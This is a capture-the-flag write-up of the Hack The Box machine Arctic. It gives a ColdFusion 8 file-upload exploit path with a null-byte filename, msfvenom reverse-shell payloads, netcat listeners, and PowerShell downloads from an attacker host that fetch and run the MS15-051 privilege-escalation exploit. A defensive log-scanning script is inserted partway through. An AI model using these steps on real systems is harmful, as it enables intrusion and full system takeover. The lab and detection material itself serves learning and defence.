HTB: Arctic


Intro:

This box was rated a 2.2/5.... Probably because the webserver took a literal 30 seconds to load a page -_-. Anyway, once we understand that port 8500 is a web port, the foothold is straightforward, and we can privesc to SYSTEM through a kernel-mode driver exploit.

Recon:

Running nmap gives us three ports, two of which together form one rabbit hole: nmap -sT -sV -A -v <ip> reveals ports [135,8500,49154]. Port 135 is the MSRPC Endpoint Mapper, which tells connecting clients which services are mapped to which port. Port 49154 is in the range of ports that the MSRPC Mapper assigns services to. This is confirmed by enumerating the endpoints with the Impacket script "rpcdump.py" [1].

Port 8500 is a non-standard port, so we'll need to do some digging to discover what it is. Nmap says it's possibly running "FMTP", which is tentatively confirmed by a quick Google search. We will come back to this port later.

Hunting the Rabbit:

rpcdump.py returns a lot of information, which I'm dumping in the attached rpcdump.txt [2]. Sifting through it all, we see that port 49154 is mapped to the "Task Scheduler Service Remoting Protocol". Some research on this service suggests that it may allow us to execute commands.

rpcdump.py output showing Task Scheduler

After hours of trying to figure out how to connect to this port, I ultimately accept failure. In most cases this would be quite bad, but I remembered that there is one more port, so I decide to give it another shot. The whole box can't be one huge rabbit hole!

Getting User:

I decide to google the port one more time. Digging around brings me to an interesting discovery: port 8500 is the default web server port for Adobe ColdFusion. I typed the url:port into Firefox and, after waiting 30 seconds, we get a webpage! It's a login page for Adobe ColdFusion. We can try some default credentials, with no luck. Exploit time! A bit of googling shows us that an arbitrary file upload is possible via a specific POST request. There are two exploits on Exploit DB that we can analyze to pull this off without Metasploit. One of them is an example POST request, and the other is a Metasploit module. I've used the Metasploit module as a framework, and the POST example as a guide to understand what exactly the Metasploit module is doing (I'm no Ruby pro, but it's getting there!).

Metasploit module's payload

We see that the module sends a POST request to "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm", while passing the URL query parameters "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00". The #{page} we will replace with whatever we want to name the payload. Something to note: the server will lock up if you try to upload a file with a name that already exists. We are sending a multipart form, which requires a boundary. We set ours to an arbitrary "---647913258". One of the data parts is filled with: form-data; name="newfile"; filename="arbitrary.txt". Checking the other exploit, we see that this is the "Content-Disposition" header.

Finally, it passes the payload, which we can generate using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp -f jsp LHOST=<your ip> LPORT=3184 > cmd.jsp. I've been unsuccessful at getting a PowerShell reverse shell, so a cmd shell will do for now. One header to be mindful of is the "Content-Length" header, which is the byte length of the entire body. Our script manages to add some extra bytes to the payload, but is still successful with our reverse shell. I've written this all into a Python script [3]. The reply should be a cool "HTTP/1.0 200 OK", and you can verify success by navigating to http://<target ip>:8500/userfiles/file, where you should see the jsp file we just uploaded. This honestly took waaaay longer to get working than I was hoping, but in the end I got it and now I have a template tool to reference!

A couple test uploads

Once the file is uploaded, start a netcat listener and navigate to the file:
nc -lvp 3184
filepath: http://<target ip>:8500/userfiles/file/cmd.jsp
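Seen from the defender's side, the upload-then-fetch sequence above leaves a distinctive trail in the web server log. The following is an added example, not part of this writeup or the ColdFusion product: it scans constructed W3C-style log lines (date, time, client IP, method, URI stem, URI query, status) and flags hits on the FCKeditor connector path, the %00 null byte in CurrentFolder, and executable files served back from /userfiles/file/. Field order and the alert wording are assumptions for the demo.

```python
# Added example (not from the writeup): flag the ColdFusion 8 / FCKeditor
# upload pattern described above in web server log lines.
import re
from urllib.parse import unquote

# Constructed sample lines: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2024-01-01 10:00:01 10.10.14.5 GET /CFIDE/administrator/index.cfm - 200
2024-01-01 10:00:09 10.10.14.5 POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00 200
2024-01-01 10:00:40 10.10.14.5 GET /userfiles/file/cmd.jsp - 200
2024-01-01 10:01:00 10.10.14.9 GET /userfiles/file/report.txt - 200
"""

CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/userfiles/file/"
# Server-side executable extensions that should never land in the upload directory.
EXEC_EXT = re.compile(r"\.(cfm|cfml|cfc|jsp|jspx|exe)$", re.IGNORECASE)


def classify(line):
    """Return a list of alert strings for one log line (empty if nothing suspicious)."""
    parts = line.split()
    if len(parts) < 7:
        return []
    _, _, src, method, stem, query, status = parts[:7]
    alerts = []
    if stem.lower().startswith(CONNECTOR):
        alerts.append(f"{src}: FCKeditor connector hit ({method} {stem})")
        decoded = unquote(query)  # turns %00 into a real NUL byte
        if "\x00" in decoded:
            alerts.append(f"{src}: null byte in CurrentFolder (filename truncation)")
        m = re.search(r"CurrentFolder=/([^&\x00]+)", decoded)
        if m and EXEC_EXT.search(m.group(1)):
            alerts.append(f"{src}: upload named {m.group(1)} via connector")
    # A successful GET of an executable file from the upload directory means
    # the payload was both written and reachable.
    if stem.lower().startswith(UPLOAD_DIR) and EXEC_EXT.search(stem) and status == "200":
        alerts.append(f"{src}: executable file served from {UPLOAD_DIR} ({stem})")
    return alerts


def scan(log_text):
    """Run classify() over every non-empty line and flatten the alerts."""
    return [a for line in log_text.splitlines() if line.strip() for a in classify(line)]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same check applies to any other upload connector that trusts a client-supplied path; blocking the CFIDE connector paths at the front end (as Adobe advised for ColdFusion 8) removes the source of this trail altogether.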

Get that user flag! type C:\Users\tolis\Desktop\user.txt

Getting Root:

To get root we need to do some vuln enumeration. First, we can get a PowerShell shell using a one-liner: powershell -Command '<one-liner>' [4]. Start a new netcat listener and now we're running PowerShell, baby! Navigate to "C:\Users\tolis\AppData\Local\Temp" so we can download files. We're gonna go with the Sherlock PowerShell script because this is an older machine (Windows Server 2008, no hotfixes). I didn't have any luck with Invoke-WebRequest, so we manually create a WebClient object and use it to download Sherlock:
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://<your ip>/path/to/Sherlock.ps1","C:\Users\tolis\AppData\Local\Temp\s.ps1")

Run the script, then run Find-AllVulns. This will list all the vulnerabilities that may affect our target. We will go with the MS15-051 exploit.

Sherlock showing us our target is vulnerable to MS15-051

Download the exploit from the SecWiki GitHub [5] and upload it: $WebClient.DownloadFile("http://<your ip>/path/to/ms.exe","C:\Users\tolis\AppData\Local\Temp\ms.exe"). To confirm it works, we can run .\ms.exe 'whoami', which will return "nt authority/system".

Finally, to get a root shell, we can upload yet another PowerShell reverse shell (courtesy of msfvenom) and listen for it:
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=<your ip> LPORT=3188 > rshl.exe
python -m http.server &
nc -lvp 3188

On the target:
$WebClient.DownloadFile("http://<your ip>:8000/rshl.exe","C:\Users\tolis\AppData\Local\Temp\rshl.exe")
.\ms.exe .\rshl.exe

Yay! We get the connection and have a system shell! type C:\Users\Administrator\Desktop\root.txt for the root flag!

Running our final reverse shell

Resources:

[1] Impacket
[2] rpcdump.txt [FILE]
[3] Adobe ColdFusion 8 AFU
[4] PowerShell One-Liner
[5] SecWiki MS15-051 exploit [EXTERNAL]